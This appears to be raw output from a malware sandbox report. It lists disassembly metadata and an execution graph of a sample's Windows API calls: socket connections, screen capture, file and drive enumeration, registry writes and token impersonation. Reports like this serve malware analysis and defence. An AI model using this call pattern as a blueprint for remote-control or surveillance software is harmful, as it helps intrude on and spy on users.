                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientScreen$ParentRectWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2099118873-0
                                                                                          • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                                          • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                                          • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                                          • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID: (nA${D@
                                                                                          • API String ID: 613200358-2741945119
                                                                                          • Opcode ID: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                                          • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                                          • Opcode Fuzzy Hash: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                                          • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                                          APIs
                                                                                            • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                                            • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                                            • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                                            • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$??3@$memmove
                                                                                          • String ID: {D@
                                                                                          • API String ID: 4294387087-1160549682
                                                                                          • Opcode ID: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                                          • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                                          • Opcode Fuzzy Hash: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                                          • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wtol
                                                                                          • String ID: GUIFlags$^L@
                                                                                          • API String ID: 2131799477-2609156739
                                                                                          • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                                          • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                                          • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                                          • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@wsprintf
                                                                                          • String ID: (%d%s)
                                                                                          • API String ID: 3815514257-2087557067
                                                                                          • Opcode ID: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                                          • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                                          • Opcode Fuzzy Hash: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                                          • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                                          APIs
                                                                                          • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                                          • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: TextWindow$Length
                                                                                          • String ID: t1@
                                                                                          • API String ID: 1006428111-473456572
                                                                                          • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                                          • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                                          • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                                          • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                                          APIs
                                                                                          • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: 7-Zip SFX$Could not allocate memory
                                                                                          • API String ID: 2030045667-3806377612
                                                                                          • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                                          • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                                          • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                                          • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                                          Execution Graph

                                                                                          Execution Coverage:3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:12.6%
                                                                                          Total number of Nodes:1092
                                                                                          Total number of Limit Nodes:29
                                                                                          execution_graph 24685 7ff67e7c47c0 12 API calls 24686 7ff67e7c55c0 LeaveCriticalSection 24691 7ff67e817bd0 21 API calls _getdrive 24692 7ff67e7e4003 250 API calls 2 library calls 24693 7ff67e7e4003 237 API calls 3 library calls 24694 7ff67e7c55d0 72 API calls sprintf 24695 7ff67e87e9bc 81 API calls 2 library calls 24696 7ff67e7e4003 209 API calls 2 library calls 24697 7ff67e7cf7d0 DeleteObject 24700 7ff67e7d1bd0 FreeLibrary 23715 7ff67e7df7d0 23716 7ff67e7df803 23715->23716 23717 7ff67e7df80d 23715->23717 23721 7ff67e7e84f0 23716->23721 23724 7ff67e857a70 6 API calls 23717->23724 23725 7ff67e7e8590 23721->23725 23755 7ff67e7c3730 23725->23755 23728 7ff67e7e8628 23731 7ff67e7e8656 23728->23731 23732 7ff67e878bf4 free 70 API calls 23728->23732 23729 7ff67e7e8612 23729->23728 23759 7ff67e7d4110 23729->23759 23730 7ff67e7e85eb SendMessageA WaitForSingleObject 23730->23729 23733 7ff67e7c3730 _RunAllParam 89 API calls 23731->23733 23734 7ff67e7e867e _RunAllParam 23731->23734 23732->23731 23733->23734 23735 7ff67e7e8757 23734->23735 23762 7ff67e82a220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 23734->23762 23736 7ff67e7e8768 23735->23736 23737 7ff67e878bf4 free 70 API calls 23735->23737 23739 7ff67e878bf4 free 70 API calls 23736->23739 23742 7ff67e7e8779 23736->23742 23737->23736 23739->23742 23740 7ff67e7e87b5 FreeLibrary 23745 7ff67e7e87bc _RunAllParam 23740->23745 23741 7ff67e7e873b 23741->23735 23743 7ff67e7e8740 SendMessageA 23741->23743 23742->23740 23742->23745 23743->23735 23744 7ff67e7e87ea DeleteObject 23746 7ff67e878bf4 free 70 API calls 23744->23746 23745->23744 23747 7ff67e7e881c DeleteObject 23746->23747 23748 7ff67e878bf4 free 70 API calls 23747->23748 23749 7ff67e7e8844 DeleteObject 23748->23749 23750 7ff67e878bf4 free 70 API calls 23749->23750 23751 7ff67e7e885d DeleteObject 23750->23751 23752 7ff67e878bf4 free 70 API calls 23751->23752 23753 7ff67e7e8876 23752->23753 23756 7ff67e7c3765 23755->23756 23757 7ff67e7c3746 23755->23757 23756->23728 23756->23729 23756->23730 23757->23756 23763 7ff67e813740 89 API calls 3 library calls 23757->23763 23764 7ff67e7d4140 23759->23764 23761 7ff67e7d4124 23761->23728 23762->23741 23763->23756 23765 7ff67e7d415c _RunAllParam 23764->23765 23766 7ff67e7d41b4 SendMessageA 23765->23766 23767 7ff67e7d41c6 23765->23767 23766->23767 23768 7ff67e7d41d5 23767->23768 23769 7ff67e7d41cf FreeLibrary 23767->23769 23768->23761 23769->23768 24701 7ff67e7db3d0 96 API calls 2 library calls 24103 7ff67e82cbc0 24104 7ff67e82cbd7 24103->24104 24105 7ff67e82cbdc socket 24103->24105 24121 7ff67e82cc40 24104->24121 24106 7ff67e82cbfb setsockopt 24105->24106 24107 7ff67e82cbf3 24105->24107 24106->24107 24109 7ff67e82cc20 24106->24109 24112 7ff67e82cf90 setsockopt 24109->24112 24113 7ff67e82cff9 setsockopt 24112->24113 24114 7ff67e82d08a getsockname getpeername 24112->24114 24115 7ff67e82d01d 24113->24115 24116 7ff67e82d022 WSAIoctl 24113->24116 24117 7ff67e82d109 SetPerTcpConnectionEStats 24114->24117 24118 7ff67e82d137 24114->24118 24115->24114 24116->24114 24117->24118 24119 7ff67e877220 _getdrive 8 API calls 24118->24119 24120 7ff67e82cc28 24119->24120 24122 7ff67e82cc4f 24121->24122 24124 7ff67e82cc87 24121->24124 24123 7ff67e7c3730 _RunAllParam 89 API calls 24122->24123 24125 7ff67e82cc67 shutdown closesocket 24123->24125 24124->24105 24125->24124 24702 7ff67e7e89e0 93 API calls _RunAllParam 24703 7ff67e7d3be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 24704 7ff67e7d09e0 82 API calls 2 library calls 24705 7ff67e7ddde0 152 API calls 24708 7ff67e7c65f1 8 API calls _getdrive 24709 7ff67e7edbf0 13 API calls _RunAllParam 24710 7ff67e7eebf0 141 API calls 2 library calls 24712 7ff67e7d03f0 CombineRgn 24713 7ff67e7c79e9 75 API calls 3 library calls 24714 7ff67e7c1000 70 API calls free 24715 7ff67e7d5203 16 API calls _getdrive 24717 7ff67e7c4200 121 API calls 2 library calls 24718 7ff67e7f5000 71 API calls free 24719 7ff67e7f3600 9 API calls _getdrive 24721 7ff67e7ca600 100 API calls _RunAllParam 24722 7ff67e7d0e00 82 API calls 3 library calls 24728 7ff67e817e10 20 API calls _getdrive 24732 7ff67e7d0010 74 API calls free 24734 7ff67e7d4c10 137 API calls 4 library calls 24735 7ff67e7d3210 18 API calls _getdrive 23770 7ff67e7de610 23771 7ff67e8792a4 __wtomb_environ 70 API calls 23770->23771 23772 7ff67e7de67f CreateRectRgn 23771->23772 23773 7ff67e8792a4 __wtomb_environ 70 API calls 23772->23773 23774 7ff67e7de6a3 CreateRectRgn 23773->23774 23775 7ff67e8792a4 __wtomb_environ 70 API calls 23774->23775 23776 7ff67e7de6c7 CreateRectRgn 23775->23776 23777 7ff67e7c3730 _RunAllParam 89 API calls 23776->23777 23846 7ff67e7de70a _RunAllParam 23777->23846 23778 7ff67e7df70d 23779 7ff67e7c3730 _RunAllParam 89 API calls 23778->23779 23780 7ff67e7df725 23779->23780 23782 7ff67e7c3730 _RunAllParam 89 API calls 23780->23782 23781 7ff67e7de740 Sleep 23840 7ff67e7de752 23781->23840 23783 7ff67e7df741 DeleteObject 23782->23783 23785 7ff67e878bf4 free 70 API calls 23783->23785 23784 7ff67e7de773 EnterCriticalSection 23784->23846 23786 7ff67e7df760 DeleteObject 23785->23786 23787 7ff67e878bf4 free 70 API calls 23786->23787 23789 7ff67e7df773 DeleteObject 23787->23789 23788 7ff67e7deab4 DeleteObject 23790 7ff67e878bf4 free 70 API calls 23788->23790 23793 7ff67e878bf4 free 70 API calls 23789->23793 23790->23846 23791 7ff67e7dead7 DeleteObject 23794 7ff67e878bf4 free 70 API calls 23791->23794 23792 7ff67e7de8cb DeleteObject 23795 7ff67e878bf4 free 70 API calls 23792->23795 23799 7ff67e7df786 23793->23799 23794->23846 23795->23846 23796 7ff67e7deafa DeleteObject 23801 7ff67e878bf4 free 70 API calls 23796->23801 23797 7ff67e7de8ee DeleteObject 23802 7ff67e878bf4 free 70 API calls 23797->23802 23805 7ff67e877220 _getdrive 8 API calls 23799->23805 23801->23846 23802->23846 23803 7ff67e7de9a6 GetRgnBox 23803->23846 23804 7ff67e7de911 DeleteObject 23809 7ff67e878bf4 free 70 API calls 23804->23809 23806 7ff67e7df7a2 23805->23806 23807 7ff67e7de7e6 GetRgnBox 23807->23846 23808 7ff67e8575c0 104 API calls 23808->23846 23809->23846 23810 7ff67e7df704 LeaveCriticalSection 23810->23778 23811 7ff67e857400 97 API calls 23811->23846 23813 7ff67e7de9f3 GetRgnBox 23813->23846 23815 7ff67e7de833 GetRgnBox 23815->23846 23816 7ff67e82d440 16 API calls 23816->23846 23817 7ff67e8792a4 __wtomb_environ 70 API calls 23819 7ff67e7debb3 CreateRectRgn CombineRgn 23817->23819 23828 7ff67e7dec05 23819->23828 23820 7ff67e7dea40 GetRgnBox 23820->23846 23822 7ff67e7df6b8 SetRectRgn 23825 7ff67e7df6da LeaveCriticalSection Sleep 23822->23825 23824 7ff67e7de87c GetRgnBox 23824->23846 23826 7ff67e7df702 23825->23826 23825->23846 23826->23778 23827 7ff67e7c3730 89 API calls _RunAllParam 23827->23846 23831 7ff67e7dec20 SetEvent 23828->23831 23853 7ff67e7e8e00 120 API calls 23828->23853 23829 7ff67e8792a4 __wtomb_environ 70 API calls 23833 7ff67e7defdf CreateRectRgn CombineRgn DeleteObject 23829->23833 23830 7ff67e8792a4 __wtomb_environ 70 API calls 23835 7ff67e7df120 CreateRectRgn CombineRgn DeleteObject 23830->23835 23831->23828 23832 7ff67e7df60b GetTickCount 23855 7ff67e82dd90 23832->23855 23834 7ff67e878bf4 free 70 API calls 23833->23834 23834->23846 23839 7ff67e878bf4 free 70 API calls 23835->23839 23839->23846 23840->23781 23840->23822 23840->23825 23840->23846 23841 7ff67e82d710 15 API calls 23841->23846 23842 7ff67e7dec4a DeleteObject 23843 7ff67e878bf4 free 70 API calls 23842->23843 23843->23846 23844 7ff67e82cc40 91 API calls 23844->23846 23846->23778 23846->23781 23846->23784 23846->23788 23846->23791 23846->23792 23846->23796 23846->23797 23846->23804 23846->23808 23846->23810 23846->23811 23846->23816 23846->23817 23846->23822 23846->23827 23846->23829 23846->23830 23846->23832 23846->23840 23846->23841 23846->23844 23847 7ff67e7cf840 73 API calls __wtomb_environ 23846->23847 23848 7ff67e7cf840 73 API calls __wtomb_environ 23846->23848 23849 7ff67e7cf840 73 API calls __wtomb_environ 23846->23849 23850 7ff67e7cf840 73 API calls __wtomb_environ 23846->23850 23851 7ff67e7cf840 73 API calls __wtomb_environ 23846->23851 23852 7ff67e7cf840 73 API calls __wtomb_environ 23846->23852 23854 7ff67e82d600 14 API calls 23846->23854 23863 7ff67e82ded0 8 API calls 2 library calls 23846->23863 23864 7ff67e7ea580 99 API calls _RunAllParam 23846->23864 23847->23807 23848->23815 23849->23824 23850->23803 23851->23813 23852->23820 23853->23842 23854->23846 23856 7ff67e82de3d 23855->23856 23862 7ff67e82ddd4 23855->23862 23857 7ff67e877220 _getdrive 8 API calls 23856->23857 23859 7ff67e82dea6 23857->23859 23858 7ff67e82ddf0 select 23858->23862 23859->23840 23860 7ff67e82de55 __WSAFDIsSet 23861 7ff67e82de67 send 23860->23861 23860->23862 23861->23862 23862->23856 23862->23858 23862->23860 23863->23846 23864->23846 24736 7ff67e7dda10 82 API calls 2 library calls 24738 7ff67e7ea420 15 API calls _getdrive 24739 7ff67e7cd820 8 API calls _RunAllParam 24741 7ff67e7e1620 150 API calls 5 library calls 24742 7ff67e87c034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 24745 7ff67e7e4003 233 API calls 3 library calls 24746 7ff67e7f3430 201 API calls 24747 7ff67e7ca830 91 API calls 2 library calls 24751 7ff67e7f6d40 165 API calls 4 library calls 24752 7ff67e7f5940 109 API calls 24753 7ff67e7d9740 101 API calls 2 library calls 24756 7ff67e811550 110 API calls _RunAllParam 24758 7ff67e7e4003 229 API calls 2 library calls 24759 7ff67e7e9150 89 API calls _RunAllParam 24760 7ff67e7ed150 177 API calls 3 library calls 24761 7ff67e7d5550 99 API calls 4 library calls 24766 7ff67e7d3d50 12 API calls _getdrive 24762 7ff67e7c6753 RegCloseKey 24763 7ff67e7ca550 104 API calls _RunAllParam 24765 7ff67e7d3550 14 API calls _getdrive 24768 7ff67e7de550 97 API calls 24126 7ff67e82cd40 inet_addr 24127 7ff67e82cd89 gethostbyname 24126->24127 24128 7ff67e82cdae htons connect 24126->24128 24129 7ff67e82cd97 24127->24129 24132 7ff67e82cda1 24127->24132 24130 7ff67e82cdd5 24128->24130 24128->24132 24129->24128 24129->24132 24131 7ff67e82cf90 14 API calls 24130->24131 24131->24132 24133 7ff67e877220 _getdrive 8 API calls 24132->24133 24134 7ff67e82cded 24133->24134 24769 7ff67e7dd149 96 API calls _RunAllParam 24770 7ff67e7d2b5e 87 API calls 24771 7ff67e7d0760 95 API calls free 24772 7ff67e7cd560 19 API calls 2 library calls 24475 7ff67e7e5958 24476 7ff67e7e596d 24475->24476 24477 7ff67e7e597e EnterCriticalSection 24476->24477 24559 7ff67e7ec2c0 24476->24559 24480 7ff67e82d890 97 API calls 24477->24480 24481 7ff67e7e59e2 24480->24481 24482 7ff67e7e7afe FlushFileBuffers 24481->24482 24483 7ff67e7e7b3d 24481->24483 24511 7ff67e7e4003 24481->24511 24602 7ff67e82dfc0 CloseHandle 24482->24602 24484 7ff67e7e7b4e FlushFileBuffers 24483->24484 24483->24511 24603 7ff67e82dfc0 CloseHandle 24484->24603 24485 7ff67e7e7b99 LeaveCriticalSection 24485->24511 24487 7ff67e7e7b2e 24487->24483 24490 7ff67e7e7c95 24492 7ff67e7e7cf7 24490->24492 24493 7ff67e7e7ca6 FlushFileBuffers 24490->24493 24491 7ff67e7e7c81 Sleep 24491->24490 24495 7ff67e7e7d59 24492->24495 24496 7ff67e7e7d08 FlushFileBuffers 24492->24496 24493->24492 24494 7ff67e7e7ce6 CloseHandle 24493->24494 24494->24492 24605 7ff67e82a3b0 93 API calls 2 library calls 24495->24605 24496->24495 24497 7ff67e7e7d48 CloseHandle 24496->24497 24497->24495 24499 7ff67e7e7d62 24501 7ff67e7e7d85 24499->24501 24606 7ff67e7f2170 16 API calls 24499->24606 24502 7ff67e7e7d9d CloseDesktop 24501->24502 24503 7ff67e7e7dbc 24501->24503 24502->24503 24507 7ff67e7e7da7 24502->24507 24512 7ff67e7c3730 _RunAllParam 89 API calls 24503->24512 24504 7ff67e7f2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 24558 7ff67e7e40c8 24504->24558 24506 7ff67e7c3730 89 API calls _RunAllParam 24506->24511 24508 7ff67e7c3730 _RunAllParam 89 API calls 24507->24508 24508->24503 24509 7ff67e7e31b0 27 API calls 24509->24558 24511->24485 24511->24506 24517 7ff67e7c3730 _RunAllParam 89 API calls 24511->24517 24529 7ff67e7e7c72 24511->24529 24534 7ff67e7e7c47 CloseDesktop 24511->24534 24536 7ff67e7e40bf CloseDesktop 24511->24536 24511->24558 24596 7ff67e82a5b0 98 API calls 2 library calls 24511->24596 24597 7ff67e82a3b0 93 API calls 2 library calls 24511->24597 24604 7ff67e7ec4e0 93 API calls _RunAllParam 24511->24604 24518 7ff67e7e7dfc GetModuleFileNameA 24512->24518 24513 7ff67e7ec590 16 API calls 24513->24558 24514 7ff67e82d440 16 API calls 24514->24558 24515 7ff67e7e419d GetTickCount 24515->24558 24519 7ff67e7e4075 OpenInputDesktop 24517->24519 24520 7ff67e7e7e15 24518->24520 24521 7ff67e7e7e56 LoadLibraryA 24518->24521 24519->24511 24522 7ff67e7e7c54 24519->24522 24607 7ff67e87a140 70 API calls 3 library calls 24520->24607 24524 7ff67e7e7e6b GetProcAddress 24521->24524 24525 7ff67e7e7e9d 24521->24525 24527 7ff67e7c3730 _RunAllParam 89 API calls 24522->24527 24528 7ff67e7e7e8f FreeLibrary 24524->24528 24538 7ff67e7e7edd 24525->24538 24608 7ff67e7de580 97 API calls _RunAllParam 24525->24608 24526 7ff67e7e7e26 24526->24521 24527->24529 24528->24525 24529->24490 24529->24491 24534->24522 24534->24529 24536->24558 24537 7ff67e7e6de8 GetLogicalDriveStringsA 24537->24558 24540 7ff67e7e7fb2 24538->24540 24542 7ff67e7c3730 _RunAllParam 89 API calls 24538->24542 24539 7ff67e82d890 97 API calls 24539->24558 24541 7ff67e877220 _getdrive 8 API calls 24540->24541 24543 7ff67e7e7ff0 24541->24543 24548 7ff67e7e7f3e 24542->24548 24544 7ff67e7e6e60 GetDriveTypeA 24544->24558 24545 7ff67e82d710 15 API calls 24545->24558 24547 7ff67e879f80 70 API calls 24547->24558 24609 7ff67e82ab00 95 API calls _RunAllParam 24548->24609 24550 7ff67e7e7055 SHGetMalloc 24552 7ff67e7e706a SHGetSpecialFolderLocation 24550->24552 24550->24558 24551 7ff67e7e710a SetErrorMode FindFirstFileA SetErrorMode 24551->24558 24553 7ff67e7e707c SHGetPathFromIDListA 24552->24553 24552->24558 24553->24558 24554 7ff67e7e7281 lstrlenA 24554->24558 24555 7ff67e7e733c FindNextFileA 24556 7ff67e7e7354 FindClose 24555->24556 24555->24558 24556->24558 24558->24504 24558->24509 24558->24511 24558->24513 24558->24514 24558->24515 24558->24529 24558->24537 24558->24539 24558->24544 24558->24545 24558->24547 24558->24550 24558->24551 24558->24554 24558->24555 24598 7ff67e8295d0 EnterCriticalSection LeaveCriticalSection 24558->24598 24599 7ff67e7ec6f0 18 API calls _RunAllParam 24558->24599 24600 7ff67e82d600 14 API calls 24558->24600 24601 7ff67e82d710 15 API calls 24558->24601 24560 7ff67e7c3730 _RunAllParam 89 API calls 24559->24560 24561 7ff67e7ec309 EnterCriticalSection 24560->24561 24563 7ff67e7ec348 24561->24563 24564 7ff67e7ec338 LeaveCriticalSection 24561->24564 24566 7ff67e7ec363 24563->24566 24567 7ff67e7ec353 LeaveCriticalSection 24563->24567 24565 7ff67e7ec4b7 24564->24565 24568 7ff67e877220 _getdrive 8 API calls 24565->24568 24569 7ff67e7ec37e 24566->24569 24570 7ff67e7ec36e LeaveCriticalSection 24566->24570 24567->24565 24571 7ff67e7ec4c7 24568->24571 24572 7ff67e7c3730 _RunAllParam 89 API calls 24569->24572 24570->24565 24571->24477 24573 7ff67e7ec393 24572->24573 24610 7ff67e82a130 73 API calls _getdrive 24573->24610 24575 7ff67e7ec39a 24576 7ff67e7ec39e 24575->24576 24577 7ff67e7ec3cd 24575->24577 24579 7ff67e7c3730 _RunAllParam 89 API calls 24576->24579 24611 7ff67e82a0c0 24577->24611 24580 7ff67e7ec3bc LeaveCriticalSection 24579->24580 24580->24565 24581 7ff67e7ec3d7 24582 7ff67e7c3730 _RunAllParam 89 API calls 24581->24582 24584 7ff67e7ec3f1 24582->24584 24583 7ff67e7ec4a1 24585 7ff67e7ec4a3 LeaveCriticalSection 24583->24585 24584->24583 24614 7ff67e829bc0 LoadLibraryA 24584->24614 24585->24565 24588 7ff67e7ec413 OpenProcess OpenProcessToken 24590 7ff67e7ec43d 24588->24590 24591 7ff67e7ec446 ImpersonateLoggedOnUser 24588->24591 24589 7ff67e7ec480 24589->24585 24592 7ff67e7ec491 timeGetTime 24589->24592 24594 7ff67e7c3730 _RunAllParam 89 API calls 24590->24594 24591->24590 24593 7ff67e7ec46c CloseHandle CloseHandle 24591->24593 24592->24585 24593->24589 24595 7ff67e7ec46a 24594->24595 24595->24593 24596->24511 24597->24511 24599->24558 24600->24558 24601->24555 24602->24487 24603->24558 24604->24511 24605->24499 24607->24526 24609->24540 24610->24575 24637 7ff67e829ef0 24611->24637 24613 7ff67e82a0d2 24613->24581 24615 7ff67e829c46 24614->24615 24616 7ff67e829c11 GetProcAddress GetProcAddress 24614->24616 24617 7ff67e829c49 GetSystemMetrics 24615->24617 24616->24615 24618 7ff67e829c40 24616->24618 24619 7ff67e829c58 24617->24619 24620 7ff67e829c80 CreateToolhelp32Snapshot 24617->24620 24618->24617 24619->24620 24621 7ff67e829c61 GetCurrentProcessId ProcessIdToSessionId 24619->24621 24622 